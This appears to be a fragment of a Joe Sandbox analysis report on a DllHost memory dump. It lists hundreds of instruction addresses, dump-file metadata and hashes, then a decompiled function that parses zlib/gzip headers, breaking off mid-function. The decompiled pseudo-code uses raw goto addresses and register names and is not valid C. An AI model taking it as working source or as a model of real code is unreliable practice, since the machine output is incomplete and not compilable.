                                                                                                                                                              0x7ff7191ce3e3
                                                                                                                                                              0x7ff7191ce3e6
                                                                                                                                                              0x7ff7191ce3ec
                                                                                                                                                              0x7ff7191ce3ff
                                                                                                                                                              0x7ff7191ce40b
                                                                                                                                                              0x7ff7191ce414
                                                                                                                                                              0x7ff7191ce41b
                                                                                                                                                              0x7ff7191ce426
                                                                                                                                                              0x7ff7191ce42b
                                                                                                                                                              0x7ff7191ce440
                                                                                                                                                              0x7ff7191ce449
                                                                                                                                                              0x7ff7191ce458
                                                                                                                                                              0x7ff7191ce45a
                                                                                                                                                              0x7ff7191ce45e
                                                                                                                                                              0x7ff7191ce465
                                                                                                                                                              0x7ff7191ce472
                                                                                                                                                              0x7ff7191ce476
                                                                                                                                                              0x7ff7191ce487
                                                                                                                                                              0x7ff7191ce48c
                                                                                                                                                              0x7ff7191ce493
                                                                                                                                                              0x7ff7191ce493
                                                                                                                                                              0x7ff7191ce497
                                                                                                                                                              0x7ff7191ce49c
                                                                                                                                                              0x7ff7191ce4a5
                                                                                                                                                              0x7ff7191ce4ae
                                                                                                                                                              0x7ff7191ce4b3
                                                                                                                                                              0x7ff7191ce4bb
                                                                                                                                                              0x7ff7191ce4c0
                                                                                                                                                              0x7ff7191ce4c7
                                                                                                                                                              0x7ff7191ce4cc
                                                                                                                                                              0x7ff7191ce4d4
                                                                                                                                                              0x7ff7191ce4d9
                                                                                                                                                              0x7ff7191ce4e5
                                                                                                                                                              0x7ff7191ce4f4
                                                                                                                                                              0x7ff7191ce502
                                                                                                                                                              0x7ff7191ce514
                                                                                                                                                              0x7ff7191ce51a
                                                                                                                                                              0x7ff7191ce51e
                                                                                                                                                              0x7ff7191ce521
                                                                                                                                                              0x7ff7191ce529
                                                                                                                                                              0x7ff7191ce52c
                                                                                                                                                              0x7ff7191ce535
                                                                                                                                                              0x7ff7191ce53b
                                                                                                                                                              0x7ff7191ce53f
                                                                                                                                                              0x7ff7191ce545
                                                                                                                                                              0x7ff7191ce549
                                                                                                                                                              0x7ff7191ce556
                                                                                                                                                              0x7ff7191ce55a
                                                                                                                                                              0x7ff7191ce55f
                                                                                                                                                              0x7ff7191ce565
                                                                                                                                                              0x7ff7191ce568
                                                                                                                                                              0x7ff7191ce56e
                                                                                                                                                              0x7ff7191ce571
                                                                                                                                                              0x7ff7191ce577
                                                                                                                                                              0x7ff7191ce57b
                                                                                                                                                              0x7ff7191ce581
                                                                                                                                                              0x7ff7191ce583
                                                                                                                                                              0x7ff7191ce588
                                                                                                                                                              0x7ff7191ce595
                                                                                                                                                              0x7ff7191ce59e
                                                                                                                                                              0x7ff7191ce5a7
                                                                                                                                                              0x7ff7191ce5ae
                                                                                                                                                              0x7ff7191ce5b5
                                                                                                                                                              0x7ff7191ce5bd
                                                                                                                                                              0x7ff7191ce5bf
                                                                                                                                                              0x7ff7191ce5c4
                                                                                                                                                              0x7ff7191ce5c8
                                                                                                                                                              0x7ff7191ce5d5
                                                                                                                                                              0x7ff7191ce5d9
                                                                                                                                                              0x7ff7191ce5dc
                                                                                                                                                              0x7ff7191ce5e1
                                                                                                                                                              0x7ff7191ce5e3
                                                                                                                                                              0x7ff7191ce5f1
                                                                                                                                                              0x7ff7191ce5f5
                                                                                                                                                              0x7ff7191ce5fd
                                                                                                                                                              0x7ff7191ce60b
                                                                                                                                                              0x7ff7191ce614
                                                                                                                                                              0x7ff7191ce61e
                                                                                                                                                              0x7ff7191ce620
                                                                                                                                                              0x7ff7191ce625
                                                                                                                                                              0x7ff7191ce629
                                                                                                                                                              0x7ff7191ce636
                                                                                                                                                              0x7ff7191ce63a
                                                                                                                                                              0x7ff7191ce63d
                                                                                                                                                              0x7ff7191ce642
                                                                                                                                                              0x7ff7191ce64e
                                                                                                                                                              0x7ff7191ce650
                                                                                                                                                              0x7ff7191ce65e
                                                                                                                                                              0x7ff7191ce660
                                                                                                                                                              0x7ff7191ce665
                                                                                                                                                              0x7ff7191ce669
                                                                                                                                                              0x7ff7191ce676
                                                                                                                                                              0x7ff7191ce67d
                                                                                                                                                              0x7ff7191ce682
                                                                                                                                                              0x7ff7191ce684
                                                                                                                                                              0x7ff7191ce68e
                                                                                                                                                              0x7ff7191ce690
                                                                                                                                                              0x7ff7191ce6b7
                                                                                                                                                              0x7ff7191ce6b9
                                                                                                                                                              0x7ff7191ce6c7
                                                                                                                                                              0x7ff7191ce6d0
                                                                                                                                                              0x7ff7191ce6d7
                                                                                                                                                              0x7ff7191ce6db
                                                                                                                                                              0x7ff7191ce6e5
                                                                                                                                                              0x7ff7191ce6ee
                                                                                                                                                              0x7ff7191ce6f8
                                                                                                                                                              0x7ff7191ce708
                                                                                                                                                              0x7ff7191ce717
                                                                                                                                                              0x7ff7191ce720
                                                                                                                                                              0x7ff7191ce725
                                                                                                                                                              0x7ff7191ce72d
                                                                                                                                                              0x7ff7191ce739
                                                                                                                                                              0x7ff7191ce73e
                                                                                                                                                              0x7ff7191ce746
                                                                                                                                                              0x7ff7191ce74b
                                                                                                                                                              0x7ff7191ce752
                                                                                                                                                              0x7ff7191ce75a
                                                                                                                                                              0x7ff7191ce761
                                                                                                                                                              0x7ff7191ce768
                                                                                                                                                              0x7ff7191ce777
                                                                                                                                                              0x7ff7191ce783
                                                                                                                                                              0x7ff7191ce788
                                                                                                                                                              0x7ff7191ce790
                                                                                                                                                              0x7ff7191ce795
                                                                                                                                                              0x7ff7191ce79e
                                                                                                                                                              0x7ff7191ce7a7
                                                                                                                                                              0x7ff7191ce7ac
                                                                                                                                                              0x7ff7191ce7b4
                                                                                                                                                              0x7ff7191ce7b9
                                                                                                                                                              0x7ff7191ce7c0
                                                                                                                                                              0x7ff7191ce7c4
                                                                                                                                                              0x7ff7191ce7d2
                                                                                                                                                              0x7ff7191ce7da
                                                                                                                                                              0x7ff7191ce7e0
                                                                                                                                                              0x7ff7191ce7e5
                                                                                                                                                              0x7ff7191ce7fa
                                                                                                                                                              0x7ff7191ce7ff
                                                                                                                                                              0x7ff7191ce806
                                                                                                                                                              0x7ff7191ce80b
                                                                                                                                                              0x7ff7191ce80d
                                                                                                                                                              0x7ff7191ce814
                                                                                                                                                              0x7ff7191ce819
                                                                                                                                                              0x7ff7191ce821
                                                                                                                                                              0x7ff7191ce82d
                                                                                                                                                              0x7ff7191ce838
                                                                                                                                                              0x7ff7191ce83e
                                                                                                                                                              0x7ff7191ce846
                                                                                                                                                              0x7ff7191ce849
                                                                                                                                                              0x7ff7191ce851
                                                                                                                                                              0x7ff7191ce85c
                                                                                                                                                              0x7ff7191ce865
                                                                                                                                                              0x7ff7191ce86f
                                                                                                                                                              0x7ff7191ce874
                                                                                                                                                              0x7ff7191ce877
                                                                                                                                                              0x7ff7191ce87c
                                                                                                                                                              0x7ff7191ce880
                                                                                                                                                              0x7ff7191ce885
                                                                                                                                                              0x7ff7191ce889
                                                                                                                                                              0x7ff7191ce88d
                                                                                                                                                              0x7ff7191ce89f
                                                                                                                                                              0x7ff7191ce8a4
                                                                                                                                                              0x7ff7191ce8a8
                                                                                                                                                              0x7ff7191ce8b1
                                                                                                                                                              0x7ff7191ce8b5
                                                                                                                                                              0x7ff7191ce8ba
                                                                                                                                                              0x7ff7191ce8c2
                                                                                                                                                              0x7ff7191ce8c8
                                                                                                                                                              0x7ff7191ce8d3
                                                                                                                                                              0x7ff7191ce8e1
                                                                                                                                                              0x7ff7191ce8ed
                                                                                                                                                              0x7ff7191ce8f0
                                                                                                                                                              0x7ff7191ce905
                                                                                                                                                              0x7ff7191ce909
                                                                                                                                                              0x7ff7191ce916
                                                                                                                                                              0x7ff7191ce918
                                                                                                                                                              0x7ff7191ce91a
                                                                                                                                                              0x7ff7191ce91f
                                                                                                                                                              0x7ff7191ce927
                                                                                                                                                              0x7ff7191ce935
                                                                                                                                                              0x7ff7191ce939
                                                                                                                                                              0x7ff7191ce941
                                                                                                                                                              0x7ff7191ce949
                                                                                                                                                              0x7ff7191ce94d
                                                                                                                                                              0x7ff7191ce953
                                                                                                                                                              0x7ff7191ce95e
                                                                                                                                                              0x7ff7191ce96b
                                                                                                                                                              0x7ff7191ce971
                                                                                                                                                              0x7ff7191ce974
                                                                                                                                                              0x7ff7191ce977
                                                                                                                                                              0x7ff7191ce97a
                                                                                                                                                              0x7ff7191ce986
                                                                                                                                                              0x7ff7191ce98a
                                                                                                                                                              0x7ff7191ce990
                                                                                                                                                              0x7ff7191ce992
                                                                                                                                                              0x7ff7191ce99a
                                                                                                                                                              0x7ff7191ce9a7
                                                                                                                                                              0x7ff7191ce9ad
                                                                                                                                                              0x7ff7191ce9b5
                                                                                                                                                              0x7ff7191ce9b7
                                                                                                                                                              0x7ff7191ce9ba
                                                                                                                                                              0x7ff7191ce9bd
                                                                                                                                                              0x7ff7191ce9c3
                                                                                                                                                              0x7ff7191ce9c6
                                                                                                                                                              0x7ff7191ce9c9
                                                                                                                                                              0x7ff7191ce9cc
                                                                                                                                                              0x7ff7191ce9cf
                                                                                                                                                              0x7ff7191ce9d8
                                                                                                                                                              0x7ff7191ce9dc
                                                                                                                                                              0x7ff7191ce9e2
                                                                                                                                                              0x7ff7191ce9e4
                                                                                                                                                              0x7ff7191ce9ec
                                                                                                                                                              0x7ff7191ce9f8
                                                                                                                                                              0x7ff7191ce9fb
                                                                                                                                                              0x7ff7191cea02
                                                                                                                                                              0x7ff7191cea0b
                                                                                                                                                              0x7ff7191cea11
                                                                                                                                                              0x7ff7191cea13
                                                                                                                                                              0x7ff7191cea1b
                                                                                                                                                              0x7ff7191cea22
                                                                                                                                                              0x7ff7191cea24
                                                                                                                                                              0x7ff7191cea2f
                                                                                                                                                              0x7ff7191cea36
                                                                                                                                                              0x7ff7191cea38
                                                                                                                                                              0x7ff7191cea3f
                                                                                                                                                              0x7ff7191cea44
                                                                                                                                                              0x7ff7191cea4c
                                                                                                                                                              0x7ff7191cea57
                                                                                                                                                              0x7ff7191cea5f
                                                                                                                                                              0x7ff7191cea63
                                                                                                                                                              0x7ff7191cea69
                                                                                                                                                              0x7ff7191cea6d
                                                                                                                                                              0x7ff7191cea72
                                                                                                                                                              0x7ff7191cea7f
                                                                                                                                                              0x7ff7191cea81
                                                                                                                                                              0x7ff7191cea83
                                                                                                                                                              0x7ff7191cea86
                                                                                                                                                              0x7ff7191cea8b
                                                                                                                                                              0x7ff7191cea8d
                                                                                                                                                              0x7ff7191cea96
                                                                                                                                                              0x7ff7191cea9e
                                                                                                                                                              0x7ff7191ceaa2
                                                                                                                                                              0x7ff7191ceaad
                                                                                                                                                              0x7ff7191ceab4
                                                                                                                                                              0x7ff7191ceac5
                                                                                                                                                              0x7ff7191cead1
                                                                                                                                                              0x7ff7191ceae2
                                                                                                                                                              0x7ff7191ceae6
                                                                                                                                                              0x7ff7191ceaf3
                                                                                                                                                              0x7ff7191ceaf5
                                                                                                                                                              0x7ff7191ceaf7
                                                                                                                                                              0x7ff7191ceafc
                                                                                                                                                              0x7ff7191ceb04
                                                                                                                                                              0x7ff7191ceb12
                                                                                                                                                              0x7ff7191ceb16
                                                                                                                                                              0x7ff7191ceb1e
                                                                                                                                                              0x7ff7191ceb22
                                                                                                                                                              0x7ff7191ceb28
                                                                                                                                                              0x7ff7191ceb33
                                                                                                                                                              0x7ff7191ceb40
                                                                                                                                                              0x7ff7191ceb46
                                                                                                                                                              0x7ff7191ceb49
                                                                                                                                                              0x7ff7191ceb4c
                                                                                                                                                              0x7ff7191ceb4f
                                                                                                                                                              0x7ff7191ceb5b
                                                                                                                                                              0x7ff7191ceb5f
                                                                                                                                                              0x7ff7191ceb65
                                                                                                                                                              0x7ff7191ceb67
                                                                                                                                                              0x7ff7191ceb72
                                                                                                                                                              0x7ff7191ceb7f
                                                                                                                                                              0x7ff7191ceb85
                                                                                                                                                              0x7ff7191ceb8d
                                                                                                                                                              0x7ff7191ceb8f
                                                                                                                                                              0x7ff7191ceb92
                                                                                                                                                              0x7ff7191ceb95
                                                                                                                                                              0x7ff7191ceb9b
                                                                                                                                                              0x7ff7191ceb9e
                                                                                                                                                              0x7ff7191ceba1
                                                                                                                                                              0x7ff7191ceba4
                                                                                                                                                              0x7ff7191ceba7
                                                                                                                                                              0x7ff7191cebb0
                                                                                                                                                              0x7ff7191cebb4
                                                                                                                                                              0x7ff7191cebba
                                                                                                                                                              0x7ff7191cebbc
                                                                                                                                                              0x7ff7191cebc4
                                                                                                                                                              0x7ff7191cebcb
                                                                                                                                                              0x7ff7191cebd8
                                                                                                                                                              0x7ff7191cebdb
                                                                                                                                                              0x7ff7191cebe2
                                                                                                                                                              0x7ff7191cebe8
                                                                                                                                                              0x7ff7191cebf1
                                                                                                                                                              0x7ff7191cebf6
                                                                                                                                                              0x7ff7191cebfe
                                                                                                                                                              0x7ff7191cec03
                                                                                                                                                              0x7ff7191cec10
                                                                                                                                                              0x7ff7191cec1a
                                                                                                                                                              0x7ff7191cec22
                                                                                                                                                              0x7ff7191cec26
                                                                                                                                                              0x7ff7191cec2c
                                                                                                                                                              0x7ff7191cec30
                                                                                                                                                              0x7ff7191cec34
                                                                                                                                                              0x7ff7191cec41
                                                                                                                                                              0x7ff7191cec43
                                                                                                                                                              0x7ff7191cec45
                                                                                                                                                              0x7ff7191cec48
                                                                                                                                                              0x7ff7191cec4d
                                                                                                                                                              0x7ff7191cec4f
                                                                                                                                                              0x7ff7191cec58
                                                                                                                                                              0x7ff7191cec5e
                                                                                                                                                              0x7ff7191cec60
                                                                                                                                                              0x7ff7191cec64
                                                                                                                                                              0x7ff7191cec6b
                                                                                                                                                              0x7ff7191cec76
                                                                                                                                                              0x7ff7191cec7c
                                                                                                                                                              0x7ff7191cec83
                                                                                                                                                              0x7ff7191cec88
                                                                                                                                                              0x7ff7191cec8a
                                                                                                                                                              0x7ff7191cec90
                                                                                                                                                              0x7ff7191cec9a
                                                                                                                                                              0x7ff7191cec9c
                                                                                                                                                              0x7ff7191ceca3
                                                                                                                                                              0x7ff7191ceca8
                                                                                                                                                              0x7ff7191cecb0
                                                                                                                                                              0x7ff7191cecb5
                                                                                                                                                              0x7ff7191cecbb
                                                                                                                                                              0x7ff7191cecc3
                                                                                                                                                              0x7ff7191ceccb
                                                                                                                                                              0x7ff7191cecd5
                                                                                                                                                              0x7ff7191cecd9
                                                                                                                                                              0x7ff7191cece0
                                                                                                                                                              0x7ff7191cece7
                                                                                                                                                              0x7ff7191cecf0
                                                                                                                                                              0x7ff7191cecf4
                                                                                                                                                              0x7ff7191cecf9
                                                                                                                                                              0x7ff7191cecfc
                                                                                                                                                              0x7ff7191cecff
                                                                                                                                                              0x7ff7191ced0a
                                                                                                                                                              0x7ff7191ced15
                                                                                                                                                              0x7ff7191ced18
                                                                                                                                                              0x7ff7191ced1e
                                                                                                                                                              0x7ff7191ced20
                                                                                                                                                              0x7ff7191ced29
                                                                                                                                                              0x7ff7191ced2f
                                                                                                                                                              0x7ff7191ced3f
                                                                                                                                                              0x7ff7191ced4a
                                                                                                                                                              0x7ff7191ced4d
                                                                                                                                                              0x7ff7191ced50
                                                                                                                                                              0x7ff7191ced53
                                                                                                                                                              0x7ff7191ced58
                                                                                                                                                              0x7ff7191ced60
                                                                                                                                                              0x7ff7191ced68
                                                                                                                                                              0x7ff7191ced72
                                                                                                                                                              0x7ff7191ced7b
                                                                                                                                                              0x7ff7191ced82
                                                                                                                                                              0x7ff7191ced8f
                                                                                                                                                              0x7ff7191ced91
                                                                                                                                                              0x7ff7191ced93
                                                                                                                                                              0x7ff7191ced9c
                                                                                                                                                              0x7ff7191ced9e
                                                                                                                                                              0x7ff7191ceda1
                                                                                                                                                              0x7ff7191ceda6
                                                                                                                                                              0x7ff7191cedb0
                                                                                                                                                              0x7ff7191cedb5
                                                                                                                                                              0x7ff7191cedc9
                                                                                                                                                              0x7ff7191cedcb
                                                                                                                                                              0x7ff7191cedd0
                                                                                                                                                              0x7ff7191cedd2
                                                                                                                                                              0x7ff7191cedd7
                                                                                                                                                              0x7ff7191ceddf
                                                                                                                                                              0x7ff7191cede3
                                                                                                                                                              0x7ff7191cedec
                                                                                                                                                              0x7ff7191cedf4
                                                                                                                                                              0x7ff7191cedf9
                                                                                                                                                              0x7ff7191cee02
                                                                                                                                                              0x7ff7191cee2b
                                                                                                                                                              0x7ff7191cee34
                                                                                                                                                              0x7ff7191cee39
                                                                                                                                                              0x7ff7191cee41
                                                                                                                                                              0x7ff7191cee46
                                                                                                                                                              0x7ff7191cee49
                                                                                                                                                              0x7ff7191cee51
                                                                                                                                                              0x7ff7191cee54
                                                                                                                                                              0x7ff7191cee56
                                                                                                                                                              0x7ff7191cee5e
                                                                                                                                                              0x7ff7191cee68
                                                                                                                                                              0x7ff7191cee75
                                                                                                                                                              0x7ff7191cee7c
                                                                                                                                                              0x7ff7191cee81
                                                                                                                                                              0x7ff7191cee85
                                                                                                                                                              0x7ff7191cee94
                                                                                                                                                              0x7ff7191cee99
                                                                                                                                                              0x7ff7191cee9f
                                                                                                                                                              0x7ff7191ceea5
                                                                                                                                                              0x7ff7191ceea7
                                                                                                                                                              0x7ff7191ceeae
                                                                                                                                                              0x7ff7191ceeb3
                                                                                                                                                              0x7ff7191ceebb
                                                                                                                                                              0x7ff7191ceec0
                                                                                                                                                              0x7ff7191ceeca
                                                                                                                                                              0x7ff7191ceecf
                                                                                                                                                              0x7ff7191ceed3
                                                                                                                                                              0x7ff7191ceed8
                                                                                                                                                              0x7ff7191ceedc
                                                                                                                                                              0x7ff7191ceee0
                                                                                                                                                              0x7ff7191ceeeb
                                                                                                                                                              0x7ff7191ceef3
                                                                                                                                                              0x7ff7191ceefe
                                                                                                                                                              0x7ff7191cef06
                                                                                                                                                              0x7ff7191cef11
                                                                                                                                                              0x7ff7191cef19
                                                                                                                                                              0x7ff7191cef1f
                                                                                                                                                              0x7ff7191cef24
                                                                                                                                                              0x7ff7191cef2c
                                                                                                                                                              0x7ff7191cef31
                                                                                                                                                              0x7ff7191cef36
                                                                                                                                                              0x7ff7191cef3b
                                                                                                                                                              0x7ff7191cef40
                                                                                                                                                              0x7ff7191cef45
                                                                                                                                                              0x7ff7191cef4a
                                                                                                                                                              0x7ff7191cef53
                                                                                                                                                              0x7ff7191cef58
                                                                                                                                                              0x7ff7191cef5d
                                                                                                                                                              0x7ff7191cef64
                                                                                                                                                              0x7ff7191cef67
                                                                                                                                                              0x7ff7191cef76
                                                                                                                                                              0x7ff7191cef78
                                                                                                                                                              0x7ff7191cef7d
                                                                                                                                                              0x7ff7191cef7f
                                                                                                                                                              0x7ff7191cef84
                                                                                                                                                              0x7ff7191cef89
                                                                                                                                                              0x7ff7191cef8d
                                                                                                                                                              0x7ff7191cef92
                                                                                                                                                              0x7ff7191cef9c
                                                                                                                                                              0x7ff7191cefa4
                                                                                                                                                              0x7ff7191cefa6
                                                                                                                                                              0x7ff7191cefa9
                                                                                                                                                              0x7ff7191cefac
                                                                                                                                                              0x7ff7191cefae
                                                                                                                                                              0x7ff7191cefb4
                                                                                                                                                              0x7ff7191cefc2
                                                                                                                                                              0x7ff7191cefcd
                                                                                                                                                              0x7ff7191cefdb
                                                                                                                                                              0x7ff7191cefe3
                                                                                                                                                              0x7ff7191cefe8
                                                                                                                                                              0x7ff7191ceff2
                                                                                                                                                              0x7ff7191ceffc
                                                                                                                                                              0x7ff7191cf003
                                                                                                                                                              0x7ff7191cf01a

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $header crc mismatch$unknown compression method$unknown header flags set
                                                                                                                                                              • API String ID: 0-4074041902
                                                                                                                                                              • Opcode ID: 3ffa5ba21bf54b00394beb5dcaed9552fb4dbf743c498a94adc432e44af9aee6
                                                                                                                                                              • Instruction ID: 2b2a5fcec498848e965a90f2af032cc91c264660ba4e591c06dc22656bb65e4e
                                                                                                                                                              • Opcode Fuzzy Hash: 3ffa5ba21bf54b00394beb5dcaed9552fb4dbf743c498a94adc432e44af9aee6
                                                                                                                                                              • Instruction Fuzzy Hash: 4BF1E572628BC546F795AF04E088B3ABBB9FF44758F854538DA4D07390DB38E88AD750
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191CD96D Relevance: 4.0, Strings: 3, Instructions: 219COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                              			E00007FF77FF7191CD96D(signed int __ebx, void* __edi, void* __ebp, signed char* __rsi, signed long long __r8, void* __r9, void* __r11, signed long long __r12, void* __r13, void* __r14, long long __r15) {
				signed int _t550;
				signed int _t587;
				signed int _t597;
				signed int _t598;
				signed int _t609;
				void* _t610;
				signed int _t630;
				signed int _t633;
				unsigned int _t635;
				unsigned int _t639;
				signed int _t655;
				signed int _t657;
				signed int _t664;
				signed char _t669;
				signed int _t682;
				signed char _t687;
				unsigned int _t694;
				void* _t695;
				signed int _t704;
				signed int _t718;
				signed int _t729;
				signed int _t731;
				signed int _t733;
				signed int _t735;
				signed int _t737;
				signed int _t739;
				signed int _t741;
				signed int _t742;
				void* _t743;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t750;
				void* _t751;
				signed int _t752;
				void* _t753;
				signed int _t754;
				void* _t755;
				signed int _t756;
				void* _t757;
				signed int _t759;
				signed int _t760;
				void* _t761;
				signed int _t763;
				signed int _t764;
				void* _t765;
				signed int _t767;
				void* _t768;
				signed int _t769;
				signed int _t770;
				void* _t771;
				signed int _t773;
				void* _t774;
				signed int _t775;
				signed int _t777;
				signed int _t778;
				signed char _t788;
				signed int _t792;
				signed char _t804;
				signed char _t822;
				signed char _t825;
				signed int _t827;
				signed char _t828;
				signed int _t832;
				signed char _t849;
				signed char _t853;
				signed char _t883;
				signed char _t886;
				signed char _t892;
				signed char _t916;
				signed char _t919;
				signed char _t925;
				void* _t927;
				intOrPtr _t928;
				void* _t932;
				signed int _t943;
				signed char _t948;
				signed int _t964;
				signed char _t969;
				void* _t971;
				void* _t975;
				void* _t979;
				signed char _t991;
				signed char _t996;
				signed int _t998;
				void* _t1000;
				void* _t1001;
				void* _t1002;
				void* _t1003;
				signed char _t1004;
				void* _t1005;
				void* _t1006;
				void* _t1007;
				void* _t1008;
				void* _t1009;
				intOrPtr _t1010;
				void* _t1011;
				void* _t1012;
				void* _t1013;
				void* _t1014;
				void* _t1015;
				void* _t1016;
				void* _t1017;
				intOrPtr _t1018;
				intOrPtr _t1019;
				void* _t1020;
				void* _t1021;
				void* _t1022;
				void* _t1023;
				void* _t1024;
				void* _t1025;
				void* _t1026;
				void* _t1028;
				unsigned int _t1031;
				unsigned int _t1032;
				signed int _t1037;
				unsigned int _t1038;
				signed int _t1039;
				unsigned int _t1040;
				signed int _t1042;
				unsigned int _t1043;
				signed char _t1045;
				signed int _t1049;
				signed int _t1054;
				unsigned int _t1055;
				unsigned int _t1058;
				unsigned int _t1059;
				signed int _t1061;
				signed int _t1062;
				signed int _t1063;
				signed int _t1064;
				unsigned int _t1065;
				unsigned int _t1067;
				unsigned int _t1072;
				unsigned int _t1075;
				unsigned int _t1078;
				signed int _t1081;
				unsigned int _t1082;
				unsigned int _t1085;
				signed int _t1087;
				unsigned int _t1088;
				signed int _t1091;
				unsigned int _t1092;
				signed int _t1094;
				unsigned int _t1095;
				signed int* _t1116;
				intOrPtr _t1137;
				intOrPtr _t1166;
				void* _t1182;
				void* _t1217;
				void* _t1229;
				intOrPtr _t1302;
				intOrPtr _t1308;
				intOrPtr _t1310;
				intOrPtr _t1311;
				intOrPtr _t1312;
				intOrPtr _t1313;
				intOrPtr _t1314;
				intOrPtr _t1315;
				intOrPtr _t1317;
				signed long long _t1322;
				signed int _t1323;
				signed long long _t1326;
				signed long long _t1327;
				signed int _t1330;
				signed long long _t1334;
				signed long long _t1336;
				signed long long _t1339;
				void* _t1342;
				intOrPtr _t1344;
				void* _t1345;
				signed long long _t1349;
				signed long long _t1350;
				signed long long _t1351;
				signed long long _t1353;
				signed long long _t1354;
				signed long long _t1355;
				void* _t1356;
				signed int* _t1358;
				intOrPtr _t1363;
				intOrPtr _t1366;
				intOrPtr _t1368;
				signed char* _t1369;
				signed char* _t1386;
				signed char* _t1387;
				signed char* _t1388;
				signed char* _t1389;
				signed char* _t1390;
				signed char* _t1391;
				signed char* _t1392;
				signed char* _t1393;
				signed char* _t1394;
				signed char* _t1395;
				signed char* _t1396;
				signed char* _t1398;
				signed char* _t1399;
				signed char* _t1400;
				signed char* _t1401;
				signed char* _t1402;
				signed char* _t1403;
				signed char* _t1405;
				signed char* _t1406;
				signed char* _t1407;
				signed char* _t1408;
				signed char* _t1409;
				signed char* _t1410;
				signed char* _t1411;
				signed char* _t1412;
				void* _t1415;
				void* _t1417;
				signed long long _t1419;
				intOrPtr _t1421;
				char* _t1428;
				char* _t1429;
				long long _t1430;
				intOrPtr _t1431;
				signed int _t1432;
				signed int _t1433;
				intOrPtr _t1434;
				void* _t1435;
				signed long long _t1436;
				long long _t1443;

				_t1436 = __r12;
				_t1435 = __r11;
				_t1419 = __r8;
				_t948 =  *(__r13 + 0x10);
				if (_t948 != 0) goto 0x191cd982;
				 *(__r13 + 8) = 0x3f40;
				goto 0x191ce001;
				if (__ebx - 0x10 >= 0) goto 0x191cd9a5;
				if (__edi == 0) goto 0x191ce19f;
				_t1000 = __edi - 1;
				_t1386 =  &(__rsi[1]);
				if (__ebx + 8 - 0x10 < 0) goto 0x191cd987;
				if ((_t948 & 0x00000002) == 0) goto 0x191cda03;
				if (__ebp + (( *__rsi & 0x000000ff) << __ebx) != 0x8b1f) goto 0x191cda03;
				if ( *(__r13 + 0x30) != 0) goto 0x191cd9c1;
				 *(__r13 + 0x30) = 0xf;
				r8d = 0;
				 *(__r13 + 0x20) = E00007FF77FF7191CF4C0(_t1356);
				 *(_t1417 + 0x30) = 0x8b1f;
				r8d = 2;
				 *(__r13 + 0x20) = E00007FF77FF7191CF4C0(_t1417 + 0x30);
				_t1031 = r15d;
				 *(__r13 + 8) = 0x3f35;
				goto 0x191cdff4;
				_t1302 =  *((intOrPtr*)(__r13 + 0x28));
				 *(__r13 + 0x18) = r15d;
				if (_t1302 == 0) goto 0x191cda1b;
				 *(_t1302 + 0x40) = 0xffffffff;
				if (( *(__r13 + 0x10) & 0x00000001) == 0) goto 0x191cdaeb;
				if (((bpl & 0xffffffff) << 8) + (_t1031 >> 8) != ((((bpl & 0xffffffff) << 8) + (_t1031 >> 8) - (0x8421085 * (((bpl & 0xffffffff) << 8) + (_t1031 >> 8)) >> 0x20) >> 1) + (0x8421085 * (((bpl & 0xffffffff) << 8) + (_t1031 >> 8)) >> 0x20) >> 4) * 0x1f) goto 0x191cdaeb;
				if ((_t1031 & 0x0000000f) == 8) goto 0x191cda70;
				 *(__r12 + 0x20) = "unknown compression method";
				 *(__r13 + 8) = 0x3f51;
				goto 0x191ce001;
				_t1032 = _t1031 >> 4;
				_t788 = (_t1032 & 0x0000000f) + 8;
				if ( *(__r13 + 0x30) != 0) goto 0x191cda8c;
				 *(__r13 + 0x30) = _t788;
				if (_t788 - 0xf > 0) goto 0x191cdad2;
				if (_t788 - _t788 > 0) goto 0x191cdad2;
				r8d = 0;
				 *(__r13 + 0x1c) = 1 << _t788;
				_t550 = E00007FF77FF7191CF7F0(0, "unknown compression method", _t1417 + 0x30, __r8, __r9);
				_t729 = r15d;
				 *(__r13 + 0x20) = _t550;
				 *(__r12 + 0x4c) = _t550;
				 *(__r13 + 8) =  !(_t1032 >> 8) & 0x00000002 | 0x00003f3d;
				_t1037 = r15d;
				goto 0x191cdff4;
				 *(__r12 + 0x20) = "invalid window size";
				 *(__r13 + 8) = 0x3f51;
				goto 0x191ce001;
				 *(__r12 + 0x20) = "incorrect header check";
				 *(__r13 + 8) = 0x3f51;
				if (_t729 - 0x10 >= 0) goto 0x191cdb2e;
				if (_t1000 == 0) goto 0x191ce19f;
				_t1001 = _t1000 - 1;
				_t1038 = _t1037 + (( *_t1386 & 0x000000ff) << _t729);
				_t1387 =  &(_t1386[1]);
				if (_t729 + 8 - 0x10 < 0) goto 0x191cdb10;
				 *(__r13 + 0x18) = _t1038;
				if (bpl == 8) goto 0x191cdb51;
				 *(__r12 + 0x20) = "unknown compression method";
				 *(__r13 + 8) = 0x3f51;
				goto 0x191ce001;
				if ((_t1038 & 0x0000e000) == 0) goto 0x191cdb72;
				 *(__r12 + 0x20) = "unknown header flags set";
				 *(__r13 + 8) = 0x3f51;
				goto 0x191ce001;
				_t1358 =  *((intOrPtr*)(__r13 + 0x28));
				_t792 = _t1038 >> 8;
				_t1116 = _t1358;
				if (_t1116 == 0) goto 0x191cdb8d;
				 *_t1358 = _t792 & 0x00000001;
				asm("bt eax, 0x9");
				if (_t1116 >= 0) goto 0x191cdbbb;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x191cdbbb;
